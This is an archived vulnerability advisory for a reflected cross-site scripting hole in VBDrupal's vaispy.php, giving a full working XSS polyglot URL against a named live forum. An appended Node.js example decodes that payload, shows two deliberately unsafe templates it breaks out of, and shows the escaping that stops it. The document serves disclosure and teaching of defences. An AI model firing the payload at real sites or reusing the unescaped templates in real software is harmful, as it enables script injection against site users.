VBDrupal Cross Site Scripting

2012-01-07T00:00:00
ID PACKETSTORM:108433
Type packetstorm
Reporter Sony
Modified 2012-01-07T00:00:00

Description

`# Exploit Title: VBDrupal Cross Site Scripting  
# Date: 6.01.2012  
# Author: Sony  
# Software Link: http://drupal.org/download  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html  
..................................................................  
  
I found this only on http://forums.techarena.in. This is vBulletin  
3.6.4 with VBDrupal.  
  
The XSS is in /vaispy.php via the do= parameter: with do=php instead of do=xml, the value of forumids= is reflected into the response unencoded, so script placed in it runs in the browser.  
  
I replaced xml with php.  
  
Original request:  
  
GET /vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=  
  
Change /vaispy.php?do=xml to /vaispy.php?do=php and put the payload in forumids=.  
  
Result. The forumids= value is a multi-context XSS polyglot: it tries to end a single- or double-quoted JavaScript string (with and without a preceding backslash) and comment out the rest of the line with //, closes an HTML comment and the script element with --></SCRIPT>, closes a double- or single-quoted attribute with ">'>, then injects a fresh <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> (which pops "XSS") followed by a YouTube <iframe>:  
  
  
http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E  
  
Greetz : AltaiR from hackzona.ru  
`
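The following is an added example and is not code from the advisory, from vBulletin or from VBDrupal. The page does not show what vaispy.php does with do=php server-side, so the two "vulnerable" templates below are hypothetical stand-ins for an endpoint that echoes forumids= into a JavaScript string literal inside a script block and into an HTML attribute. The payload is the forumids= value from the PoC URL above, cut after the injected </SCRIPT> (the trailing iframe adds nothing new). The example decodes it, shows that each template lets it break out, and shows the context-aware encoding (a JSON-derived JS string literal with the HTML-significant characters escaped, and HTML entity escaping for attributes) that neutralises it.

```javascript
// Added example, not part of the original advisory or of vBulletin/VBDrupal.
// Decodes the forumids= payload from the PoC URL, reflects it through two
// hypothetical templates (a JS string literal inside <script>, and an HTML
// attribute), and shows the context-aware encoding that stops the break-out.
'use strict';

// The forumids= value from the PoC, URL-encoded exactly as in the advisory,
// cut after the injected </SCRIPT> (the trailing <iframe> is omitted).
const ENCODED_FORUMIDS =
  '%27;alert%28String.fromCharCode%2888,83,83%29%29//\\%27;alert%28String.fromCharCode%2888,83,83%29%29//' +
  '%22;alert%28String.fromCharCode%2888,83,83%29%29//\\%22;alert%28String.fromCharCode%2888,83,83%29%29//' +
  '--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E';

// What the server sees after query-string decoding: a polyglot that tries to
// end a single- or double-quoted JS string (with or without a preceding
// backslash), close a comment and the script element, close a quoted
// attribute, and finally inject a fresh <SCRIPT> block.
function decodePayload() {
  return decodeURIComponent(ENCODED_FORUMIDS);
}

// Hypothetical vulnerable rendering: raw parameter inside a JS string literal.
function renderScriptVulnerable(forumids) {
  return '<html><body><script>var forumids = \'' + forumids + '\';</script></body></html>';
}

// Hypothetical vulnerable rendering: raw parameter inside a quoted attribute.
function renderAttrVulnerable(forumids) {
  return '<html><body><input name="forumids" value="' + forumids + '"></body></html>';
}

// Safe JS string literal. JSON.stringify handles quotes and backslashes; the
// extra replacements matter because the HTML tokenizer does not understand JS
// escapes, so a literal "</script>" inside the string would still terminate
// the script element. U+2028/U+2029 are escaped because older JS engines
// treated them as line terminators even inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Safe text for HTML element content and quoted attribute values.
function htmlEscape(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderScriptSafe(forumids) {
  return '<html><body><script>var forumids = ' + jsStringLiteral(forumids) + ';</script></body></html>';
}

function renderAttrSafe(forumids) {
  return '<html><body><input name="forumids" value="' + htmlEscape(forumids) + '"></body></html>';
}

// Cheap check: how many <script ...> start tags the HTML parser would see.
// A page meant to contain exactly one script block that ends up with two
// (or an attribute-only page that ends up with one) has been broken out of.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

function main() {
  const payload = decodePayload();
  console.log('decoded forumids=', payload);
  console.log('vulnerable <script> context: ', scriptTagCount(renderScriptVulnerable(payload)), 'script tag(s)');
  console.log('safe <script> context:       ', scriptTagCount(renderScriptSafe(payload)), 'script tag(s)');
  console.log('vulnerable attribute context:', scriptTagCount(renderAttrVulnerable(payload)), 'script tag(s)');
  console.log('safe attribute context:      ', scriptTagCount(renderAttrSafe(payload)), 'script tag(s)');
}

main();
```

Run with node. The vulnerable script template yields two script blocks and the vulnerable attribute template one, while both safe templates keep the payload inert; the hardened literal still round-trips to the original string (JSON.parse recovers it), which is the property a fix must keep so the page's own code keeps working. Fixing the content type of the do=php response alone would not be enough if the parameter is also echoed into an HTML page elsewhere; the encoder has to match the context the value lands in.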